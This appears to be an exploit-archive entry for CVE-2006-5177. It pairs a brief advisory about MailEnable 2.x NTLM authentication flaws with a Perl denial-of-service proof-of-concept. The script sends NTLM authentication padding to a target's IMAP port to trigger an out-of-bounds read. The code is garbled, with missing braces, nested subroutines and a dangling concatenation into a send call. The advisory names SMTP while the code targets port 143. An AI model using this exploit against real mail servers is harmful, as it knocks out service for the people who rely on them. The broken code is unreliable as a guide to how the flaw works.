MailEnable 2.x - SMTP NTLM Multiple Authentication Vulnerabilities

Related Vulnerabilities: CVE-2006-5177  
Publish Date: 29 Nov 2006
Author: mu-b

MailEnable is prone to multiple remote vulnerabilities. 

These issues arise in the SMTP server during NTLM authentication and may facilitate arbitrary code execution or denial-of-service conditions.

MailEnable Professional 2.0 and MailEnable Enterprise 2.0 are reported vulnerable to these issues.

# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#              Mail Enable Professional v2.35 (win32)
# out of bounds read == DoS

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;


my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);

    $buf = ($PAD x 12).
           ($PAD x 12);
    send(SOCKET, encode_base64($buf)."\r\n", 0);

    $buf = ($PAD x 28).
           ($PAD x 2).
    send(SOCKET, encode_base64($buf)."\r\n", 0);

    print("-> * Successfully sent payload!\n");

sub print_header {
    print("MailEnable Pro <=v2.36 DoS POC\n");
    print("by: <mu-b\>\n\n");

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test


sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");